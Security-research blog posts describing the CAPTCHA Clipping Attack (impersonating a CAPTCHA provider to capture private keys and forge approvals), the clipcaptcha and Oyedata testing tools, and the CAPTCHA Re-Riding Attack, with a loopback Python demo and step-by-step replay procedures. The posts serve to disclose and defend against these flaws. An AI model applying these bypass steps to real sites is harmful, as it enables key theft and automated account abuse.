<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9za8i2fhrTtIPoKchEXyDbqzckuCEawT2Je6WPpYqfiThsyPqn5xeigr_vFRwVAUgIuE8Z3469JoK1NcKDKMS2Ca65tyELnaTM-q87O219fpvGlsXRRDwfQo5vILlqRpBDFQTVpEqWA_t/s1600/recaptcha-dotnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9za8i2fhrTtIPoKchEXyDbqzckuCEawT2Je6WPpYqfiThsyPqn5xeigr_vFRwVAUgIuE8Z3469JoK1NcKDKMS2Ca65tyELnaTM-q87O219fpvGlsXRRDwfQo5vILlqRpBDFQTVpEqWA_t/s400/recaptcha-dotnet.png" width="400" /></a></div>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">In this scenario, two types of attack can be launched against vulnerable CAPTCHA implementations. Both assume that the attacker is able to intercept the CAPTCHA validation traffic between the target website and the CAPTCHA provider.</span><br />
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;">Private Key Compromise</span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;">Most CAPTCHA providers issue a private and a public key to identify a particular consumer and to enforce an upper limit on the number of CAPTCHAs it uses. The private key is sent to the CAPTCHA provider during the CAPTCHA validation process. If the keys are sent using plain text HTTP, an attacker can sniff the private key and:</span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><br /></span></div>
<ol style="text-align: left;">
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Use the CAPTCHA service without registering for it, by presenting the captured keys.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Exhaust the target website’s CAPTCHA quota for the service, which, depending on the CAPTCHA provider, may cause a wide variety of unexpected issues.</span></li>
</ol>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;">The CAPTCHA Clipping Attack</span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;">The following image describes what I call the "CAPTCHA Clipping Attack". Steps 5 and 6 in blue are the normal sequence of events; steps 5 and 6 in red are the attack. We'll go into the attack in a little more detail below.</span></div>
<div style="line-height: 18px;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKeE5FsBKJz4HJxx2-OfH8OXKM0_ih8xPdYLTUvQRDb0F6MagUTPsFL_eePnnFOU4HqoB001i651ybYLKdWYoxtRaufYY6J0YtZpRwPlP_Hl_DED2hKouJJ88Snq5RbPI5LgEPmZC5ce0K/s1600/captcha-clipping-attack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKeE5FsBKJz4HJxx2-OfH8OXKM0_ih8xPdYLTUvQRDb0F6MagUTPsFL_eePnnFOU4HqoB001i651ybYLKdWYoxtRaufYY6J0YtZpRwPlP_Hl_DED2hKouJJ88Snq5RbPI5LgEPmZC5ce0K/s400/captcha-clipping-attack.png" width="400" /></a></div>
<div style="line-height: 18px;">
<br /></div>
<br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">Since the website’s application server acts as a client to the CAPTCHA provider during steps 5 and 6 (in blue), and the application server often neglects to validate the CAPTCHA provider’s identity or the integrity of the exchange, an attacker may be able to impersonate the CAPTCHA provider and undermine the anti-automation protection (steps 5 and 6 in red). CAPTCHA validation responses are mostly Boolean (true or false, success or failure, pass or fail, 0 or 1), and the response format and its contents are publicly documented as part of the CAPTCHA provider’s API. This allows an attacker to easily construct the finite set of possible responses, impersonate the CAPTCHA provider, and return malicious CAPTCHA validation results to the application server. </span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">To exploit this vulnerability an attacker performs the following:</span></span><br />
<br />
<ol style="text-align: left;">
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">The attacker acts as a legitimate application user and submits a large number of requests to the web application.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">At the same time, he/she intercepts CAPTCHA validation requests, masquerades as the CAPTCHA provider and approves all submitted requests.</span></li>
</ol>
<br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">Masquerading as the CAPTCHA provider and not forwarding the CAPTCHA validation requests to the actual CAPTCHA provider is the CAPTCHA Clipping Attack.</span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
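The interception, private key capture and forged reply described in the two sections above, as an added Python example (it is not clipcaptcha's code and not any provider's library): build_verify_request() and parse_verify_reply() model the reCAPTCHA v1 style verify API the integration libraries spoke (form-encoded privatekey, remoteip, challenge and response in; a body of "true" or "false" plus an error code out); clip() is a constructed stand-in for what a clipping proxy does with a request it intercepts; verify_captcha() is the consumer-side fix, refusing an http:// verify URL before the private key leaves the host and, for https://, letting the default SSL context verify the provider's certificate and hostname. The private key, client IP and loopback provider are all made up for the demo.<br />

```python
"""Added example, not clipcaptcha's code: the reCAPTCHA v1 style verification
call, the forged reply a clipping proxy returns, and the consumer-side fix."""
import http.server
import ssl
import threading
import urllib.parse
import urllib.request

def build_verify_request(private_key, remote_ip, challenge, response):
    """Form body the v1 verify API expected: privatekey, remoteip, challenge, response."""
    return urllib.parse.urlencode({"privatekey": private_key, "remoteip": remote_ip,
                                   "challenge": challenge, "response": response}).encode("ascii")

def parse_verify_reply(body):
    """v1 answered 'true' or 'false' followed by an error code on the next line."""
    lines = body.decode("ascii", "replace").split("\n")
    verdict = lines[0].strip()
    if verdict not in ("true", "false"):
        raise ValueError("unexpected verification reply: %r" % body[:64])
    return verdict == "true", (lines[1].strip() if len(lines) > 1 else "")

def clip(form_body):
    """Constructed stand-in for a clipping proxy: keep the keys from the intercepted
    request, never forward it, and answer the only value the consumer accepts."""
    fields = dict((k, v[0]) for k, v in urllib.parse.parse_qs(form_body.decode("ascii")).items())
    return fields, b"true\n"

class ClippingHandler(http.server.BaseHTTPRequestHandler):
    """Loopback 'provider' that applies clip() to every POST it receives."""
    captured = []

    def do_POST(self):
        fields, reply = clip(self.rfile.read(int(self.headers.get("Content-Length", "0"))))
        ClippingHandler.captured.append(fields)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):
        pass

def verify_url_is_safe(url):
    """The consumer-side fix: only ever talk to the provider over HTTPS."""
    return urllib.parse.urlsplit(url).scheme == "https"

def verify_captcha(verify_url, private_key, remote_ip, challenge, response, allow_plain_http=False):
    """Server-side check. With the safe default an http:// verify URL is refused before the
    private key leaves the host; over https:// the default SSL context verifies the provider's
    certificate chain and hostname, which is what defeats impersonation."""
    if not allow_plain_http and not verify_url_is_safe(verify_url):
        raise ValueError("refusing to send the private key over plain HTTP: " + verify_url)
    req = urllib.request.Request(verify_url, data=build_verify_request(private_key, remote_ip, challenge, response))
    with urllib.request.urlopen(req, timeout=5, context=ssl.create_default_context()) as resp:
        return parse_verify_reply(resp.read())

if __name__ == "__main__":
    # Loopback demo: the "provider" is the clipping proxy; values below are made up.
    server = http.server.HTTPServer(("127.0.0.1", 0), ClippingHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    url = "http://127.0.0.1:%d/recaptcha/api/verify" % server.server_address[1]
    key = "6Le-example-private-key"
    solved, _ = verify_captcha(url, key, "203.0.113.5", "chal", "garbage", allow_plain_http=True)
    print("plain HTTP: wrong answer accepted as solved=%s, private key captured=%s"
          % (solved, ClippingHandler.captured[-1]["privatekey"] == key))
    try:
        verify_captcha(url, key, "203.0.113.5", "chal", "garbage")
    except ValueError as err:
        print("hardened:", err)
    server.shutdown()
```

Run it and the first call, which opts into plain HTTP, shows a wrong CAPTCHA answer accepted as solved with the private key sitting in the proxy's capture; the second call fails closed. Pinning the verify URL to HTTPS inside the integration library is the same change on the consumer side; on the provider side only a signed or MAC'd verdict would let a consumer detect a forged reply on an unauthenticated channel.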
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: x-large;"><span style="line-height: 18px;">clipcaptcha</span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">clipcaptcha is a proof-of-concept exploitation tool that specifically targets the vulnerabilities discussed above and allows complete bypass of the CAPTCHA provider's protection. clipcaptcha is built on the <a href="http://www.thoughtcrime.org/software/sslstrip/" target="_blank">sslstrip </a>codebase and has the following features:</span></span><br />
<br />
<ol style="text-align: left;">
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Performs signature based CAPTCHA provider detection and clipping.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Can be easily extended to masquerade as any CAPTCHA provider by adding corresponding signatures to the configuration XML file.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Has built in signatures of several CAPTCHA providers including reCAPTCHA, OpenCAPTCHA, Captchator etc…</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">Logs POST requests that match any supported CAPTCHA provider to capture private and public keys. Unmatched requests are forwarded as is.</span></li>
<li><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px;">clipcaptcha supports five operational modes. These are “monitor”, “stealth”, “avalanche”, “denial of service” and “random”.</span></li>
</ol>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguNHVoaYfdRW_xHdAt-ZrlhQdB9AkxKjmZ15tIZ6wD_CAuMZ8LpqsdY2tnZ8s_8eji0b6S1UM3vhIuB8a0G9djECcjvFE3GGus5itKIQGxVcIIbH3EDEWe_Q2U8e8AySIn13wnyGv_NeDy/s1600/clipcaptcha-help.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguNHVoaYfdRW_xHdAt-ZrlhQdB9AkxKjmZ15tIZ6wD_CAuMZ8LpqsdY2tnZ8s_8eji0b6S1UM3vhIuB8a0G9djECcjvFE3GGus5itKIQGxVcIIbH3EDEWe_Q2U8e8AySIn13wnyGv_NeDy/s320/clipcaptcha-help.png" width="320" /></a></div>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><br /></span></span>
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;"><span style="font-size: x-large;">Download</span></span></span><br />
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><span style="line-height: 18px;">clipcaptcha can be downloaded <a href="https://github.com/OpenSecurityResearch/clipcaptcha" target="_blank">here</a>.</span></span><br />
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;"><br /></span></div>
<div style="line-height: 18px;">
<span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;">This blog post is a copy of my original post <a href="http://blog.opensecurityresearch.com/2012/08/bypassing-captchas-by-impersonating.html" target="_blank">here</a></span></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Oct 7, 2012 Update: </b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">The complete whitepaper is available for download from <a href="http://www.mcafee.com/us/resources/white-papers/foundstone/wp-bypassing-captchas.pdf" target="_blank">here</a>.</span><br />
<br />
<br />
<br /></div>
Gursev Singh Kalra (http://www.blogger.com/profile/11125392470187170013)

Oyedata for OData Security Assessments (posted 2012-06-12)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="MsoNormal">
The Open Data Protocol (OData) is an open web protocol for querying and updating data. OData enables the creation of HTTP based RESTful data services that can be used to publish and edit resources with simple HTTP messages. OData is intended to be used to expose and access information from a variety of sources including relational databases, file systems, content management systems, and traditional web sites. It allows a consumer to query a data source over HTTP and get results back in formats like Atom, JSON or plain XML. OData can be thought of as the JDBC/ODBC of the internet.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The protocol is relatively new and is being adopted by many major software manufacturers such as Microsoft, IBM, and SAP, but it hasn’t been publicly explored in terms of security. As more applications, websites, and frameworks support OData, a larger attack surface becomes available to attackers.</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Oyedata is a new tool to perform black-box OData security testing and help secure OData deployments. I wrote Oyedata from a penetration testing perspective, and its major features are summarized below:</div>
<ol style="text-align: left;">
<li>Intuitive GUI based tool written in C#.</li>
<li>Ability to create attack templates from local and remote Service Documents and Service Metadata Documents.</li>
<li>Support for XML and JSON data formats.</li>
<li>Ability to export attack templates in JSON and XML formats that can be fed to custom fuzzing code.</li>
<li>Ability to engage the OData services for manual testing.</li>
<li>Data generator for EDMSimpleType test data generation.</li>
<li>Ability to generate “Read URIs” for Entities, Entity Properties and Entity Property Values.</li>
<li>Ability to generate attack templates for creation of new Entries, updating existing Entries, Service Operation invocation, Entry deletion etc…</li>
<li>Ability to identify Keys, Nullable and Non-Nullable Properties and indicate the same in the attack templates.</li>
<li>Web proxy, HTTP and HTTPS support and error logging.</li>
</ol>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<br /></div>
<div class="WhitePaperBodycopy" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<br /></div>
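<div class="MsoNormal">
What features 2, 7 and 9 above boil down to, as an added example that is not Oyedata's own code: parse a Service Metadata Document (the EDMX/CSDL an OData v2 service returns from /$metadata), pull out the entity sets, their key properties and which properties are nullable, and turn that into read-URI templates for every feed, entry, property and property value, plus one per service operation. The metadata document below is constructed for the example (a Northwind-style "Categories" feed with a second, two-key entity type to show composite keys); the base URL and the {placeholder} notation are this example's conventions, not the tool's.</div>
<br />
```python
import xml.etree.ElementTree as ET

# Constructed sample Service Metadata Document; not taken from any real service.
SAMPLE_METADATA = """
<edmx:Edmx Version="1.0" xmlns:edmx="http://schemas.microsoft.com/ado/2007/06/edmx">
  <edmx:DataServices xmlns:m="http://schemas.microsoft.com/ado/2007/08/dataservices/metadata"
                     m:DataServiceVersion="2.0">
    <Schema Namespace="DemoModel" xmlns="http://schemas.microsoft.com/ado/2008/09/edm">
      <EntityType Name="Category">
        <Key><PropertyRef Name="CategoryID"/></Key>
        <Property Name="CategoryID" Type="Edm.Int32" Nullable="false"/>
        <Property Name="CategoryName" Type="Edm.String" Nullable="false" MaxLength="15"/>
        <Property Name="Description" Type="Edm.String"/>
      </EntityType>
      <EntityType Name="Order">
        <Key><PropertyRef Name="OrderID"/><PropertyRef Name="Region"/></Key>
        <Property Name="OrderID" Type="Edm.Int32" Nullable="false"/>
        <Property Name="Region" Type="Edm.String" Nullable="false"/>
        <Property Name="Total" Type="Edm.Decimal" Nullable="true"/>
      </EntityType>
      <EntityContainer Name="DemoEntities" m:IsDefaultEntityContainer="true">
        <EntitySet Name="Categories" EntityType="DemoModel.Category"/>
        <EntitySet Name="Orders" EntityType="DemoModel.Order"/>
        <FunctionImport Name="TopCategories" EntitySet="Categories"
                        ReturnType="Collection(DemoModel.Category)" m:HttpMethod="GET">
          <Parameter Name="count" Type="Edm.Int32" Mode="In"/>
        </FunctionImport>
      </EntityContainer>
    </Schema>
  </edmx:DataServices>
</edmx:Edmx>
"""


def _local(tag):
    """Strip the namespace prefix ElementTree puts on element and attribute names."""
    return tag.rsplit("}", 1)[-1]


def _attr(el, name, default=None):
    for key, value in el.attrib.items():
        if _local(key) == name:
            return value
    return default


def parse_metadata(xml_text):
    """Return the entity sets (with keys and per-property nullability) and the
    service operations declared in a CSDL document."""
    root = ET.fromstring(xml_text.strip())
    types = {}
    for et in root.iter():
        if _local(et.tag) != "EntityType":
            continue
        keys = [_attr(ref, "Name") for key in et if _local(key.tag) == "Key"
                for ref in key if _local(ref.tag) == "PropertyRef"]
        props = [{"name": _attr(p, "Name"), "type": _attr(p, "Type"),
                  # CSDL: a Property without a Nullable attribute is nullable
                  "nullable": _attr(p, "Nullable", "true").lower() == "true",
                  "key": _attr(p, "Name") in keys}
                 for p in et if _local(p.tag) == "Property"]
        types[_attr(et, "Name")] = {"keys": keys, "properties": props}
    sets, ops = {}, []
    for el in root.iter():
        if _local(el.tag) == "EntitySet":
            type_name = _attr(el, "EntityType").rsplit(".", 1)[-1]
            sets[_attr(el, "Name")] = {"type": type_name, **types[type_name]}
        elif _local(el.tag) == "FunctionImport":
            ops.append({"name": _attr(el, "Name"),
                        "method": _attr(el, "HttpMethod", "GET"),
                        "params": [(_attr(p, "Name"), _attr(p, "Type"))
                                   for p in el if _local(p.tag) == "Parameter"]})
    return {"entity_sets": sets, "service_operations": ops}


def _literal(name, edm_type):
    """Placeholder in OData v2 key-literal syntax: strings quoted, numbers bare."""
    return "'{%s}'" % name if edm_type == "Edm.String" else "{%s}" % name


def read_uri_templates(base, model):
    """Feed, entry, property and property-$value URIs per entity set, then one URI per
    service operation with its parameters as query-string placeholders."""
    uris = []
    for set_name, info in model["entity_sets"].items():
        prop_types = {p["name"]: p["type"] for p in info["properties"]}
        keys = info["keys"]
        if len(keys) == 1:
            key_part = _literal(keys[0], prop_types[keys[0]])
        else:
            key_part = ",".join("%s=%s" % (k, _literal(k, prop_types[k])) for k in keys)
        feed = "%s/%s" % (base, set_name)
        entry = "%s(%s)" % (feed, key_part)
        uris += [feed, entry]
        for p in info["properties"]:
            uris.append("%s/%s" % (entry, p["name"]))
            uris.append("%s/%s/$value" % (entry, p["name"]))
    for op in model["service_operations"]:
        query = "&".join("%s=%s" % (n, _literal(n, t)) for n, t in op["params"])
        uris.append("%s/%s%s" % (base, op["name"], "?" + query if query else ""))
    return uris


def required_properties(model):
    """Non-nullable properties (keys included) per entity set: the fields a Create
    template must carry for the service to accept the entry."""
    return {name: [p["name"] for p in info["properties"] if not p["nullable"]]
            for name, info in model["entity_sets"].items()}


if __name__ == "__main__":
    model = parse_metadata(SAMPLE_METADATA)
    for uri in read_uri_templates("https://svc.example/odata.svc", model):
        print(uri)
    print(required_properties(model))
```
<br />
<div class="MsoNormal">
Every URI a tester would otherwise type by hand comes out of the metadata document, which is why a metadata endpoint left readable to anonymous users is the first thing to check in an OData assessment: it is the complete map of the service's attack surface, entity by entity and property by property.</div>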
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2FRE1xY_h_G7gIhhTNjPWxK66zNYqjrwa47lovzfER6eXalgMlnhrT3pK3UvwuSFHKFPlZoo_QJp9LGUTst7yqYYbZje6CEhSAqHrcudf_5qf4Reb-g-rDCjrwjEnUw_C2SaZp4qcyJ8Q/s1600/InitialRun.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2FRE1xY_h_G7gIhhTNjPWxK66zNYqjrwa47lovzfER6eXalgMlnhrT3pK3UvwuSFHKFPlZoo_QJp9LGUTst7yqYYbZje6CEhSAqHrcudf_5qf4Reb-g-rDCjrwjEnUw_C2SaZp4qcyJ8Q/s400/InitialRun.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: left;">Image shows Oyedata retrieving an OData Service Metadata document</span> </td></tr>
</tbody></table>
<div class="WhitePaperBodycopy">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdSp7QoacFmBgcuMC8tIDcNSCtFW3JwZXgwbZ6slg7wTtUoMERLoPgY5Wbv05p-TnUrxl7KQTrKGnG0estv8S8DhIpS8muFOM3C4bl6NPE55tULBgV77R4lNKL6U166w3WC11Oxhe8ByoZ/s1600/all-types-of-requests.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdSp7QoacFmBgcuMC8tIDcNSCtFW3JwZXgwbZ6slg7wTtUoMERLoPgY5Wbv05p-TnUrxl7KQTrKGnG0estv8S8DhIpS8muFOM3C4bl6NPE55tULBgV77R4lNKL6U166w3WC11Oxhe8ByoZ/s400/all-types-of-requests.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small; text-align: left;">Image shows various Create, Read, Delete and Update operations of the “Categories” Feed along with the supported Service Operation nodes</span>
</td></tr>
</tbody></table>
<div class="WhitePaperBodycopy">
<br /></div>
<div class="WhitePaperBodycopy">
</div>
<div class="WhitePaperBodycopy">
The tool is now available for download from the McAfee website at <a href="http://www.mcafee.com/us/downloads/free-tools/oyedata.aspx" target="_blank">this</a> URL. Please send in your suggestions and feedback.</div>
</div>
Gursev Singh Kalra (http://www.blogger.com/profile/11125392470187170013)

CAPTCHA Re-Riding Attack (posted 2012-03-02, updated 2014-05-15)<div dir="ltr" style="text-align: left;" trbidi="on">
This attack was voted #8 in the <a href="https://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/">Top Ten Web Hacking Techniques of 2012</a>.<br />
<br />
<div class="MsoNormal">
The CAPTCHA Re-Riding Attack bypasses the CAPTCHA protection built into web applications. The attack exploits the fact that the code that verifies CAPTCHA solutions sent by the user during form submissions does not clear the CAPTCHA solution from the HTTP session. </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Impact:</b> <span style="font-family: Calibri, sans-serif; line-height: 115%;">A large number of successful submissions on CAPTCHA protected pages by riding on a single CAPTCHA solution.</span> </div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: 'Trebuchet MS', sans-serif;">A typical scenario to demonstrate the vulnerability is explained below. </span></div>
<div class="MsoNormal">
</div>
<ol style="text-align: left;">
<li>A user visits the register page of the website.</li>
<li>The website creates an HTTP session, assigns it a SESSIONID and returns the register page to the user along with the SESSIONID cookie. The register page also contains an image tag which directs the browser to retrieve a CAPTCHA and display it on screen.</li>
<li>Upon parsing the image tag, the browser sends out a request for the CAPTCHA.</li>
<li>The server side code creates a new CAPTCHA with random text, and the CAPTCHA solution is stored in the HTTP session.</li>
<li>The CAPTCHA image is then sent to the client and displayed by the browser.</li>
<li>The browser sends the CAPTCHA solution along with the form fields for verification.</li>
<li>The server side code retrieves the CAPTCHA solution from the HTTP session and verifies it against the solution provided by the client.</li>
<li>If verification is successful, the client is sent to the next logical step in the registration process. If not, the client is redirected to the register page (step 1 above).</li>
</ol>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif;"><span style="font-size: 15px; line-height: 22px;"><br />
</span></span></div>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 150%;"><br />
</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhulF9UOCtMWOeQi8hAUIe2oParYlWrfrpeTUnhbX10bmd5Nn2uQOp6WHlz16vJYkm8oAYm2HPu7p58NChVEccmaGpxjg1tR0MaDi1g5Z5zZI_xM6Nq02A5kgMiSf_lzOSGNC7EJ5QXdCp-/s1600/sample-captcha-implementation.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhulF9UOCtMWOeQi8hAUIe2oParYlWrfrpeTUnhbX10bmd5Nn2uQOp6WHlz16vJYkm8oAYm2HPu7p58NChVEccmaGpxjg1tR0MaDi1g5Z5zZI_xM6Nq02A5kgMiSf_lzOSGNC7EJ5QXdCp-/s400/sample-captcha-implementation.png" height="248" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div class="MsoCaption">
<span style="font-size: x-small;"><span style="font-family: Verdana, sans-serif;">Figure 1</span><span style="font-family: Verdana, sans-serif;">: Image shows an example Register page that supports CAPTCHA</span></span><span style="font-size: 11pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<br />
Analysis of the CAPTCHA generation and verification process reveals the following:<br />
<ol style="text-align: left;">
<li><span style="text-indent: -0.25in;">The captcha.php page is the only page responsible for updating the HTTP session with the correct CAPTCHA solution. </span><span style="color: red; text-indent: -0.25in;">The first ingredient.</span></li>
<li>The CAPTCHA solution inside the HTTP session is not explicitly cleared during the verification process. Yes, you guessed it right. <span style="color: red;">This is the second and the most important ingredient for CAPTCHA Re-Riding Attacks.</span></li>
<li>When registration fails (for any reason), the web application continues to use the same HTTP session and SESSIONID. We will not look into this further.</li>
<li>When registration succeeds, the user is redirected to the next step and the CAPTCHA generation page (/captcha.php) is not likely to be called again for the current session. This allows the CAPTCHA solution to stay in the HTTP session for as long as the session is valid. Following are the likely scenarios to be seen when CAPTCHA verification is successful.</li>
<ol>
<li>The web application generates a new SESSIONID for the same HTTP session for known security reasons. This implementation is the most likely to be seen. <span style="color: red;">Combine this behavior with the first and second ingredients above and you have a successful CAPTCHA Re-Riding attack.</span></li>
<li>The web application continues to use the same SESSIONID for the same HTTP session. Here we have more things to worry about than just the CAPTCHA. <span style="color: red;">For now, combine this behavior with the first and second ingredients above and you have a successful CAPTCHA Re-Riding attack again.</span></li>
<li>The web application generates a completely new HTTP session with a new or the same SESSIONID. For the CAPTCHA Re-Riding Attack, this scenario is not exploitable.</li>
</ol>
</ol>
<br />
<div class="MsoNormal">
For scenarios 4.a and 4.b, the HTTP Session continues to hold the CAPTCHA solution as it is not explicitly cleared by the CAPTCHA verification code. Since /captcha.php is not going to be called again (and we will not let the call happen anyway), the same CAPTCHA solution continues to exist in HTTP session. Let us now see how <b>4.a</b> & <b>4.b</b> scenarios above can be exploited to make multiple successful submissions using a CAPTCHA solution.<o:p></o:p></div>
<br />
<br />
<div class="MsoNormal">
<b>Exploiting Scenario 4.b:<o:p></o:p></b></div>
<ol style="text-align: left;">
<li>Load the register page of the target website in a web browser.</li>
<li>Solve the CAPTCHA manually and submit the form.</li>
<li>Record this form submission using a web proxy. This request contains a valid SESSIONID, valid form fields and a valid CAPTCHA solution.</li>
<li>Create a custom script or use a tool like Burp Intruder that can repeatedly send this request to the server. With each request, change the unique values (like User ID) to create multiple new accounts with a single CAPTCHA solution.</li>
</ol>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in;">
<br /></div>
<div class="MsoNormal">
<b>Exploiting Scenario 4.a:<o:p></o:p></b></div>
<ol style="text-align: left;">
<li>Load the register page of the target website in a web browser.</li>
<li>Solve the CAPTCHA manually and submit the form.</li>
<li>To make things easy, trap this request in a web proxy and do not allow it to reach the web server. This request contains a valid SESSIONID, valid form fields and a valid CAPTCHA solution.</li>
<li>Create a custom script or use a tool like Burp Intruder that can repeatedly send this request to the server.</li>
<li>Submit one request.</li>
<li>Upon successful submission, the web application will reset the current SESSIONID and send the new SESSIONID back in the response headers.</li>
<li>Change the value of SESSIONID in the recorded request (step 3) to the value copied from the response in step 6 above.</li>
<li>Go to step 5.</li>
<li>We will be able to make multiple successful submissions with a single CAPTCHA solution.</li>
</ol>
<div class="WhitePaperBodycopy" style="margin-bottom: .0001pt; margin-bottom: 0in; margin-left: .5in; margin-right: 0in; margin-top: 0in; mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span style="font-family: Calibri, sans-serif;"><span style="font-size: 15px; line-height: 17px;"><br />
</span></span></div>
